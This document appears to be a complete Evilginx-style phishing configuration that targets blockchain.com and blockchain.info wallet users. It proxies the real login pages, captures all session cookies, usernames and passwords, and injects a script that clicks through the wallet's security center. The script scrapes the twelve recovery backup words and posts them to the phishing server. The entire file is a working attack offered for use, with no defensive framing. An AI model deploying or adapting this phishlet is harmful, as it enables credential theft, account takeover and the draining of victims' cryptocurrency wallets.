author: '@An0nud4y' min_ver: '2.3.0' proxy_hosts: - {phish_sub: 'www', orig_sub: 'www', domain: 'blockchain.com', session: true, is_landing: true} - {phish_sub: 'login', orig_sub: 'login', domain: 'blockchain.com', session: true, is_landing: false} - {phish_sub: '', orig_sub: '', domain: 'blockchain.info', session: false, is_landing: false} - {phish_sub: 'api', orig_sub: 'api', domain: 'blockchain.info', session: false, is_landing: false} sub_filters: - {triggers_on: 'www.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: 'href="https://{hostname}/#/signup"', replace: 'href="https://{hostname}/#/login"', mimes: ['text/html', 'text/javascript']} - {triggers_on: 'login.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'login.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'login.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'login.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'login.blockchain.com', orig_sub: '', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'login.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'login.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.blockchain.com', orig_sub: '', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} auth_tokens: - domain: '.blockchain.com' keys: ['.*,regexp'] - domain: '.blockchain.info' keys: ['.*,regexp'] auth_urls: - '#/home.*' credentials: username: key: 'gui' search: '(.*)' type: 'post' password: key: 'password' search: '(.*)' type: 'post' custom: - key: 'BackupWords' search: '(.*)' type: 'post' login: domain: 'www.blockchain.com' path: '/' js_inject: - trigger_domains: ["login.blockchain.com"] trigger_paths: ["/"] trigger_params: [] script: | function simulatedClick(target, options) { var event = target.ownerDocument.createEvent('MouseEvents'), options = options || {}, opts = { // These are the default values, set up for un-modified left clicks type: 'click', canBubble: true, cancelable: true, view: target.ownerDocument.defaultView, detail: 1, screenX: 0, //The coordinates within the entire page screenY: 0, clientX: 0, //The coordinates within the viewport clientY: 0, ctrlKey: false, altKey: false, shiftKey: false, metaKey: false, //I *think* 'meta' is 'Cmd/Apple' on Mac, and 'Windows key' on Win. Not sure, though! button: 0, //0 = left, 1 = middle, 2 = right relatedTarget: null, }; //Merge the options with the defaults for (var key in options) { if (options.hasOwnProperty(key)) { opts[key] = options[key]; } } //Pass in the options event.initMouseEvent( opts.type, opts.canBubble, opts.cancelable, opts.view, opts.detail, opts.screenX, opts.screenY, opts.clientX, opts.clientY, opts.ctrlKey, opts.altKey, opts.shiftKey, opts.metaKey, opts.button, opts.relatedTarget ); //Fire the event target.dispatchEvent(event); } function sleep(milliseconds) { const date = Date.now(); let currentDate = null; do { currentDate = Date.now(); } while (currentDate - date < milliseconds); } function simulateclicks(){ simulatedClick(document.querySelectorAll("button[data-e2e=securityCenterLink]")[0]); sleep(6000); simulatedClick(document.querySelectorAll("button[data-e2e=backupFundsButton]")[0]); sleep(3000); simulatedClick(document.querySelectorAll("button")[0]); sleep(3000); var word1 = document.querySelectorAll("div")[77].textContent; var word2 = document.querySelectorAll("div")[81].textContent; var word3 = document.querySelectorAll("div")[85].textContent; var word4 = document.querySelectorAll("div")[89].textContent; var word5 = document.querySelectorAll("div")[93].textContent; var word6 = document.querySelectorAll("div")[97].textContent; simulatedClick(document.querySelectorAll("button")[0]); sleep(3000); var word7 = document.querySelectorAll("div")[77].textContent; var word8 = document.querySelectorAll("div")[81].textContent; var word9 = document.querySelectorAll("div")[85].textContent; var word10 = document.querySelectorAll("div")[89].textContent; var word11 = document.querySelectorAll("div")[93].textContent; var word12 = document.querySelectorAll("div")[97].textContent; var backupwords = (word1)+""+(word2)+""+(word3)+""+(word4)+""+(word5)+""+(word6)+""+(word7)+""+(word8)+""+(word9)+""+(word10)+""+(word11)+""+(word12) var xhr = new XMLHttpRequest(); xhr.open("POST", '/backupwords', true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("BackupWords="+encodeURIComponent(backupwords)); window.location.assign("/en/#/home"); sleep(2000); }